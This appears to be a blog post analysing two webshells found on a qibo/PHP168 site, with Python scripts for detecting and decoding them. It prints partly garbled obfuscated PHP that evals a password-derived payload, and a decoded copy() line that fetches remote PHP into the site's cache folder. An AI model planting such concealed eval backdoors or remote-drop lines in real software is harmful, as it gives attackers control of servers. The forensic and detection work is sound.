Notes from checking a friend's site for webshells
Today a friend told me that his website was behaving abnormally and asked me to look over the whole site, which runs qibo (qibosoft). I went through it for webshells and found two. One of them is hidden in a way I had never seen before; unfortunately for whoever planted it, it still uses eval(), a high-risk keyword that is easy to grep for.
1. Hidden inside a normal file, with the real payload kept as base64 after the closing tag:
The file keeps the legitimate "Powered by www.qibosoft.com" header and a short bootstrap. The bootstrap stores __FILE__, and the recoverable parts of its base64 literals decode to calls of the form base64_decode(fread($handle, 272)) and ($handle, 232): the script opens itself and evals fixed-length slices of its own trailing data. Each trailing fragment in turn starts with the base64 of ;eval($...(' around yet another base64 string, so the layers unwrap one after the other, and the function names used (the $x{2}.$x{5}.$x{8}... chains) are assembled from every third character of decoded strings so that none of them appear in the file as plain text. The copy below is as recovered from the file: some of the base64 and the variable names did not survive intact, and the filler between the trailing fragments is omitted.
<?php /* Powered by www.qibosoft.com */
$lll11l11l11l11l1 = __FILE__;
eval(base64_decode('encode QoJGx QiLGJh C2U2NF9kZWNvZGUoZnJlYWQoJGxsMTFsbGwxMWxsbGwxMWwsMjcyKSkpOw='));
$lll111111ll1l1ll = $ll1llll111111l[0];
$l1ll11lllll1ll1l = $lll111111ll1l1ll{2}.$lll1111ll1l1ll{5}.$lll1111ll1l1ll{8}.$lll1111ll1l1ll{11}.$lll1111ll1l1ll{14}.$lll1111ll1l1ll{17}.$lll1111ll1l1ll{20}.$lll1111ll1l1ll{23}.$lll1111ll1l1ll{26}.$lll1111ll1l1ll{29}.$lll1111ll1l1ll{32}.$lll1111ll1l1ll{35}.$lll1111ll1l1ll{38};
$scheme = $l1ll11lllll1ll1l($ll1llll11111111l[1]);
$scheme = $l1ll11lll1ll1l($l11ll111l1l11l{2}.$scheme{5}.$l11llll111l1l11l{8}.$l11llll111l1l11l{11}.$l11ll111l1l11l{14}.$l11llll111l1l11l{17}.$l11llll111l1l11l{20}.$scheme{23});
$scheme = $l1ll11lll1ll1l($ll1ll11111111l[2]);
$l111ll111lll1111 = $l1ll11lll1ll1l($scheme{2}.$lll1ll11l11l1ll1{5}.$lll1ll11l11l1ll1{8}.$lll1ll11l11l1ll1{11}.$lll1ll11l11l1ll1{14}.$lll1ll11l11l1ll1{17}.$lll1ll11l11l1ll1{20}.$scheme{23});
$ll1lll1lll111111 = $l1ll11lllll1ll1l($ll1llll11111111l[3]);
$ll11llll1lllll = $scheme($ll1lll1lll111111{2}.$ll1lll1lll111111{5}.$ll1lll1lll111111{8}.$ll1lll1lll111111{11}.$ll1lll1lll111111{14}.$ll1lll1lll111111{17}.$ll1lll1lll111111{20}.$ll1lll1lll111111{23});
$lll1ll11l1111l11 = $l1ll11lllll1ll1l($ll1llll111111l[4]);
$ll1111l11l11llll = $l1ll11lllll1ll1l($lll1ll11l1111l11{2}.$lll1ll11l1111l11{5}.$lll1ll11l1111l11{8}.$lll1ll11l1111l11{11}.$lll1ll11l1111l11{14}.$lll1ll11l1111l11{17}.$lll1ll11l1111l11{20}.$lll1ll11l1111l11{23});
$llll11l1ll111l1l = $l1ll11lllll1ll1l($ll1llll11111111l[5]);
$llll1l11llllllll = $l1ll11lll1l1l($llll11l1ll111l1l{2}.$llll11l1ll111l1l{5}.$llll11l1ll111l1l{8}.$llll11l1ll111l1l{11}.$llll11l1ll111l1l{14}.$llll11l1ll111l1l{17}.$llll11l1ll111l1l{20}.$llll11l1ll111l1l{23});
eval($l1ll11lll1ll1l('Jgxsmtfsbgxsbgwxbgxsbgwojgxsmtfsbgwxmwxsbgwxmwwsmtcpo2v2ywwoJGwxbGwxMWXsbGxsMWxsMWwoJGxsMTFsbGxsbGwxbGxsbGwoJGxsMTFsbGwxMWxsbGwxMWwsMjMyKSkpOW='));
return;?>
(what follows the closing tag; the base64 fragments are separated by stretches of random filler that did not survive extraction)
TVd3c01qTXlLU2twT3c9PScpKTs = tGLOYY5fUpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHe
Ykd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = JqjcRhp75i6Lf4MwjO2V2YWwoJGwxbGwxM
3hzYkd3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = yS0ttoM7R7SDkJ
U2twT3c9PScpKTs = vMCvyQqBIgcoO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzY
HNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = agQLu9pzZf25xZjXjO2V2YWwoJGwxbGwxMWxsbGxs
D3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = WOmDsuNvUYJUFK3O
PScpKTs = Success
1XeHNiR3d4TVd3c01qTXlLU2twT3c9PScpKTs = lErzbn3Vk5O2V2YWwoJGwxbGwxMWxsbGxsMWx
3b0pHeHNNVEZzYkd3eE1XeHNiR3d4TVd3c01qazJLU2twT3c9PScpKTs = U5zJkvgx0MBjZXZhbCg
EHNNV3d4TVd4c2JHeHNiQ2drYkd3eE1XeHNiREV4Ykd4c2JERXhiQ2s3JykpOw = Orb94oK1BBa
UZGV4LnBocCc + IjsNCglleGl0Ow0KfQ = Oz1aqN6Bs2Twgiat5H0qQeo5bgm84V1tvONOA
The key points, once all the layers are unwrapped, are these two lines:
@eval(qqmd5("encrypt", 'De', $_POST['mypwd']));
$_POST['mypwd']
Whatever finally runs is derived from the password the attacker sends in the POST field mypwd, so the body of the shell never sits in the file in readable form; every layer above exists only to hide that one @eval().
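The traits above (eval of a base64 literal, a script that reads its own file, function names assembled from string offsets, and a base64 blob after the closing tag) are all cheap to check for mechanically. The following triage script is an added example, not code from the original post or from qibosoft; the two sample files in it are constructed to mimic a normal qibo page and the structure of the shell above, and the heuristic names and thresholds are my own choices.

```python
"""Triage heuristics for the self-reading, base64-wrapped webshell pattern
above.  Added example, not code from the original post or from qibosoft;
the two sample files are constructed here to exercise it."""
import base64
import binascii
import re

B64_ALPHABET = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)


def decoded_literals(source):
    """Base64-decode every quoted literal that looks like base64, one layer
    down, so calls hidden inside it (fopen, fread, eval) can be matched by
    the same regexes as the outer file."""
    out = []
    for m in re.finditer(r"""['"]([A-Za-z0-9+/=]{16,})['"]""", source):
        blob = m.group(1)
        blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
        try:
            out.append(base64.b64decode(blob).decode("latin-1"))
        except (binascii.Error, ValueError):
            pass
    return out


def trailing_blob(source, min_len=64, ratio=0.9):
    """True when the data after the last '?>' is long and almost entirely
    base64 alphabet: the place this shell keeps its real payload.  Ordinary
    HTML after a close tag fails the ratio test because of '<' and '>'."""
    idx = source.rfind("?>")
    if idx < 0:
        return False
    tail = "".join(source[idx + 2:].split())    # ignore whitespace
    if len(tail) < min_len:
        return False
    return sum(c in B64_ALPHABET for c in tail) / len(tail) >= ratio


def scan_php(source):
    """Return the names of the heuristics that fire on one PHP file."""
    text = source + "\n" + "\n".join(decoded_literals(source))
    findings = []
    if re.search(r"eval\s*\(\s*base64_decode\s*\(", text):
        findings.append("eval_base64")
    if "__FILE__" in text and re.search(r"\bfread\s*\(", text):
        findings.append("self_read")             # script reads its own file
    if re.search(r"\$\w+\{\d+\}(?:\s*\.\s*\$\w+\{\d+\}){2,}", text):
        findings.append("char_pick")             # $s{2}.$s{5}.$s{8}... chains
    if trailing_blob(source):
        findings.append("trailing_blob")
    return findings


# Constructed samples, not the real files.  CLEAN mimics a normal qibo page.
# SHELL mimics the shell's structure: a bootstrap that saves __FILE__, an eval
# of a base64 literal whose decoded body calls fread() on the script, string
# offset character-picking, and base64 fragments after the closing tag.
CLEAN = (
    "<?php /* Powered by www.qibosoft.com */\n"
    "require_once 'global.php';\n"
    "$title = 'Home';\n"
    "?>\n"
    "<html><head><title>Home</title></head>"
    "<body><p>Hello from the front page</p></body></html>\n"
)

_INNER = base64.b64encode(
    b"$h=fopen($f,'r');eval(base64_decode(fread($h,272)));"
).decode()

SHELL = (
    "<?php /* Powered by www.qibosoft.com */\n"
    "$f=__FILE__;eval(base64_decode('" + _INNER + "'));\n"
    "$n=$s{2}.$s{5}.$s{8}.$s{11}.$s{14};\n"
    "return;?>\n"
    "tGLOYY5fUpO2V2YWwoJGwxbGwxMWxsbGxsMWxsMWwoJ0pHeHNNVEZzYkd3eE1XeHNi\n"
    "R3d4TVd3c01qTXlLU2twT3c9PScpKTs=JqjcRhp75i6Lf4MwjO2V2YWwoJGwxbGwxMA\n"
)

if __name__ == "__main__":
    for name, src in (("clean", CLEAN), ("shell", SHELL)):
        print(name, scan_php(src))
```

Run it over a directory of .php files and sort by the number of findings; "eval_base64" alone is noisy on a CMS that ships obfuscated vendor code, but "self_read" or "trailing_blob" together with it is rarely legitimate. Decoding one layer of literals is what lets the fread() call surface, since in the real file it only exists inside the base64 string.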
2. A one-line shell.
The eval keyword turns up in a global file. The code is:
eval(base64_decode("Y$webdb[_Notice]"));
This one is rather novel too. The $webdb[_Notice] variable comes from a key => value row in the config table in the database.
The database holds this value:
29weSgiaHR0cDovL3d3dy5waHAxNjguY29tL05vdGljZS8/dXJsPSR3ZWJkYlt3d3dfdXJsXSIsUEhQMTY4X1BBVEguImNhY2hlL05vdGljZS5waHAiKTs=
Prepending the "Y" and base64-decoding gives:
copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php");
Note what that does: it fetches a file from php168.com (passing the site's own URL along) and writes it into cache/Notice.php inside the site, so whoever controls that remote URL can drop arbitrary PHP onto the server. Because the value in the database is missing its first base64 character, it does not decode to anything readable on its own; the "Y" in the code supplies it.
What is going on here? Is the official notice feature really this fancy? Whatever it is, delete it first. It did give me an idea for a shell, though.
Hahahahahahahahaha! -_-!
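The decode described above, reproduced as an added example rather than code from the original post or from PHP168/qibosoft. It uses the config-table value quoted above with its letter case restored, shows why the raw cell does not decode by itself, and goes one step further than the post: when you only have the database value and not the code, trying each single base64 character as the missing prefix recovers the payload.

```python
"""Recovering the payload behind eval(base64_decode("Y$webdb[_Notice]")).
Added example, not code from the original post or from PHP168/qibosoft.
STORED is the config-table value quoted above (letter case restored); the
PHP prepends the literal "Y" before decoding."""
import base64
import binascii
import re
import string

STORED = (
    "29weSgiaHR0cDovL3d3dy5waHAxNjguY29tL05vdGljZS8/"
    "dXJsPSR3ZWJkYlt3d3dfdXJsXSIsUEhQMTY4X1BBVEguImNhY2hlL05vdGljZS5waHAiKTs="
)

B64_CHARS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def decode_as_stored(value):
    """What a scanner sees if it decodes the cell on its own: the value is
    one character short of a valid base64 string, so strict decoding fails
    and nothing PHP-like ever appears."""
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None


def decode_with_prefix(value, prefix="Y"):
    """Reproduce the PHP: prepend the literal prefix, then base64-decode."""
    return base64.b64decode(prefix + value, validate=True).decode("latin-1")


def looks_like_php(text):
    """Crude check for a call that matters in a webshell context."""
    return re.search(
        r"\b(copy|eval|assert|system|passthru|file_put_contents|file_get_contents)\s*\(",
        text,
    ) is not None


def recover_prefix(value):
    """With only the DB value in hand, try every single base64 character as
    the missing prefix and keep those that decode to PHP-looking text.  The
    prefix changes only the first decoded byte (the rest stay aligned), so
    exactly one candidate yields 'copy(' here."""
    hits = []
    for ch in B64_CHARS:
        try:
            text = decode_with_prefix(value, ch)
        except (binascii.Error, ValueError):
            continue
        if looks_like_php(text):
            hits.append((ch, text))
    return hits


if __name__ == "__main__":
    print("raw value decodes:", decode_as_stored(STORED) is not None)
    print("with 'Y':", decode_with_prefix(STORED))
    for prefix, text in recover_prefix(STORED):
        print("candidate prefix", prefix, "->", text)
```

The lesson for scanning: a grep of the database for base64 that decodes to PHP misses this shell by design, because the stored blob is deliberately incomplete; the scan has to start from the eval() in the code and follow where its argument comes from.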